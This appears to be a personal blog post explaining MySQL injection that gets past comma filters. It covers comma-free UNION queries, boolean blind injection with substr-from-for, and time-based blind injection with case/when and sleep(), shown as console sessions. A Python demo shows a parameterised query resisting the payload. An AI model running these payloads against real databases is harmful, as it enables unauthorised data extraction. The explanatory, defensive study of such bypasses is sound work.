C1imber's Blog

# MySQL injection when commas are filtered

2019/02/27


I suddenly ran into a problem that left me baffled, so I searched Baidu and studied it a bit; writing it down here. I am still too green, sigh, time to keep learning!

### UNION queries:

The comma in a UNION payload normally sits in the column list (`select 1,2`); joining two single-column derived tables yields the same two-column row without one.

```mysql
mysql> select * from user union select * from ((select 1)A join (select 2)B);
+----+----------+
| id | username |
+----+----------+
| 1 | test |
| 1 | 2 |
+----+----------+
2 rows in set (0.05 sec)
```

### Boolean-based blind injection:

`substr(str from pos for len)` is the standard-SQL form of `substr(str, pos, len)`, so the same one-character comparison works without a comma.

```mysql
mysql> select substr(user() from 1 for 1);
+-----------------------------+
| substr(user() from 1 for 1) |
+-----------------------------+
| r |
+-----------------------------+
1 row in set (0.00 sec)
mysql> select * from user where id=1 and substr(user() from 1 for 1)='r';
+----+----------+
| id | username |
+----+----------+
| 1 | test |
+----+----------+
1 row in set (0.00 sec)
mysql> select * from user where id=1 and substr(user() from 1 for 1)='a';
Empty set (0.00 sec)
mysql> select substr(user() from 2 for 1);
+-----------------------------+
| substr(user() from 2 for 1) |
+-----------------------------+
| o |
+-----------------------------+
1 row in set (0.00 sec)
mysql> select * from user where id=1 and substr(user() from 2 for 1)='o';
+----+----------+
| id | username |
+----+----------+
| 1 | test |
+----+----------+
1 row in set (0.00 sec)
```
### Time-based blind injection:
**Use case ... when ... then ... else ... end in place of an if() test**

Both queries below return an empty set because `sleep()` evaluates to 0, so the `and` condition is always false; the signal is the elapsed time shown next to the result.
```mysql
mysql> select * from user where id=1 and case substr(user() from 1 for 1) when 'r' then sleep(5) else sleep(0) end;
Empty set (5.04 sec)
mysql> select * from user where id=1 and case substr(user() from 1 for 1) when 'o' then sleep(5) else sleep(0) end;
Empty set (0.00 sec)
```
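To make the defensive point of all three sections concrete, here is an added example (not code from the original post) showing why a comma blacklist is not a fix: a string-built query guarded only by a comma check still accepts the comma-free UNION from above, while a parameterised query treats the same input as plain data. It uses Python's `sqlite3` on a constructed in-memory `user` table standing in for the MySQL one (SQLite lacks `substr ... from ... for` and `sleep()`, so only the UNION variant is exercised), and the function names are my own.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the post's MySQL `user` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'test')")
    return conn


def comma_filter(value: str) -> str:
    """The blacklist the post works around: reject any input containing a comma."""
    if "," in value:
        raise ValueError("comma rejected")
    return value


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Query built by string concatenation, 'protected' only by the comma filter."""
    sql = "SELECT id, username FROM user WHERE id=" + comma_filter(user_id)
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT id, username FROM user WHERE id=?", (user_id,)
    ).fetchall()


# Comma-free UNION from the post: two joined one-column derived tables
# stand in for `select 1,2`, so the comma filter never fires.
PAYLOAD = "1 UNION SELECT * FROM (SELECT 1) A JOIN (SELECT 2) B"


def demo() -> dict:
    """Run a normal id and the payload through both lookups."""
    conn = make_db()
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "1"),
        "normal_safe": lookup_safe(conn, "1"),
        "payload_vulnerable": lookup_vulnerable(conn, PAYLOAD),  # extra row leaks
        "payload_safe": lookup_safe(conn, PAYLOAD),  # bound as text, no match
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The parameterised lookup returns the real row for `"1"` and nothing for the payload, which is the behaviour a comma blacklist cannot give you.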

I will add more to this when I have time~
